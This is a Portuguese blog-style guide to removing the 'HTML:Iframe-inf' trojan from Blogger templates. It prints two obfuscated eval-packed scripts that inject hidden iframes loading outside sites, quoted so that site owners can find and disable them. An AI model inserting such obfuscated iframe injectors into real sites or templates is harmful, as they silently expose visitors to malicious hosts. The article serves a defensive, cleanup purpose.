O que é o vírus HTML: Iframe-inf e o que ele pode fazer de Mal?
Quando se cria um site ou blog, você precisa instalar um template e, muitas vezes, ele vem com alguns scripts que redireciona o teu site para uma página com vírus. Às vezes, os tais scripts nem redirecionam, mas permitem a instalação de trojans no teu site. Um desses trojans é o malware é HTML:Iframe-inf.
Esses tais trojans são malwares que executam diversos tipos de atividades sem o seu conhecimento, por exemplo: instalação de outros malwares, coleta de informações, acesso a suas conexões de acesso remoto, download/upload de arquivos, captura de entrada de teclado, execução/encerramento de processos, execução de ataques de negação de serviços como o DoS, e tantas outras atividades.
O seu antivírus pode te ajudar a detectar trojans como esse e outros tipos de ameças no teu site, ou em sites que esteja visitando.
Quando encontrar alguma ameaça, você precisa acessar o código-fonte do teu site e verificar qual é o script que está infectado por vírus/trojan. Depois que encontrar, precisa remover o script ou trocar por outro script que não esteja infectado.
O nome desse trojan no antivírus avast é HTML:Iframe-inf. Se o seu antivírus é outro, ele pode receber outro nome, por exemplo, no Nod32, essa ameça é identificada como Trojan HTML/Iframe.gen.
Em resumo, quando se acessa um site infectado com HTML:Iframe-inf, pode ocorrer uma espécie de conexão invisível com outro servidor sem o seu conhecimento. Isso pode ocasionar a instalação indevida desse trojan no seu computador para roubar a suas informações, desfigurar as páginas do seu site e gerar diversos tipos de spams.
Passo a passo para remover O trojan HTML:Iframe-inf
Para remover o trojan HTML:Iframe-inf, assista o vídeo a seguir. Nele explica o que fazer para desativar os scripts responsáveis por esse malware.
Fonte: Canal Dyou Tech
Para resolver esse problema, primeiro acesse o código-fonte do seu site/blog. Na plataforma blogger, procure pela opção Tema e clique a setinha no painel que aparecer. Em seguida, clique em editar HTML que terá acesso ao código-fonte na plataforma Blogger.
ATENÇÃO: antes de fazer qualquer mudança no código-fonte, faça o backup do tempate do seu site. Isso por que se você cometer algum erro, basta reinstalar novamente o backup.
O próximo passo, procure os scripts a seguir:
Script 01:
<script type='text/javascript'>//<![CDATA[
eval(function(m,c,h){function z(i){return(i< 62?'':z(parseInt(i/62)))+((i=i%62)>35?String.fromCharCode(i+29):i.toString(36))}for(var i=0;i< m.length;i++)h[z(i)]=m[i];function d(w){return h[w]?h[w]:w;};return c.replace(/\b\w+\b/g,d);}('document|write|unescape|iframe|class|widd|src|https|www|shareron|xyz'.split('|'),'0.1(2(\'<3 4="5" 6 ="7://8.9.a"></3>\'));',{}))
//]]></script>
Script 02:
<script type='text/javascript'>//<![CDATA[
eval(function(m,c,h){function z(i){return(i< 62?'':z(parseInt(i/62)))+((i=i%62)>35?String.fromCharCode(i+29):i.toString(36))}for(var i=0;i< m.length;i++)h[z(i)]=m[i];function d(w){return h[w]?h[w]:w;};return c.replace(/\b\w+\b/g,d);}('document|write|unescape|3Ciframe|20class|3D|22bloggge|22|20src|20|22https|3A|bloggerfollowerss|blogspot|com|br|3E|3C|iframe'.split('|'),'0.1(2("%3%4%5%6%7%8%9%5%a%b//c.d.e.f/%7%g%h/i%g"))',{}))
//]]></script>
ATENÇÃO: você pode procurar por esses scripts, clicando no botão control + F que vai abrir uma barrinha de pesquisa, e dentro dela coloque cada código para pesquisar.
Quando encontrar esses códigos, desative eles. Para fazer isso, basta colocar cada script após o comando <!-- e antes do comando -->.
ATENÇÃO: os comandos <!-- e --> desativam qualquer código que venha dentro dele, por exemplo:
<!--
<script type='text/javascript'>//<![CDATA[
Qualquer script é desativado se for escrito assim
//]]></script>
-->
Após desativar os códigos 1 e 2, atualize o seu site e verifique se o teu antivírus detecta o trojan HTML:Iframe-inf. Provavelmente, se você estiver utilizando um antivírus diferente do Avast, esse malware possuirá outro nome, mas são o mesmo tipo de vírus.
Se não tiver mais outros scripts maliciosos no teu site, muito provavelmente não haverá mais problema com esse tipo de vírus.
Resumo Para eliminar o vírus HTML iFrame-inf do seu site, siga estas etapas:
1. **Faça um Backup**: Antes de qualquer ação, faça um backup completo do seu site.
2. **Identifique o Vírus**: Verifique os arquivos do seu site em busca de códigos suspeitos, especialmente em arquivos HTML e JavaScript.
3. **Remova o Código Malicioso**: Delete qualquer código ou arquivo desconhecido que você encontrar. Isso pode incluir iFrames ocultos e scripts não autorizados.
4. **Atualize Seu CMS e Plugins**: Se você usa um sistema de gerenciamento de conteúdo (CMS), mantenha-o e seus plugins sempre atualizados para evitar vulnerabilidades.
5. **Verifique Configurações de Segurança**: Revise as configurações de segurança do seu servidor e adicione firewalls, se necessário.
6. **Monitore Regularmente**: Utilize ferramentas de monitoramento para detectar problemas futuros rapidamente.
7. **Considere Consultar um Profissional**: Se a remoção for complicada, pode ser útil contratar um especialista em segurança.
Seguindo essas etapas, você poderá restaurar a segurança do seu site.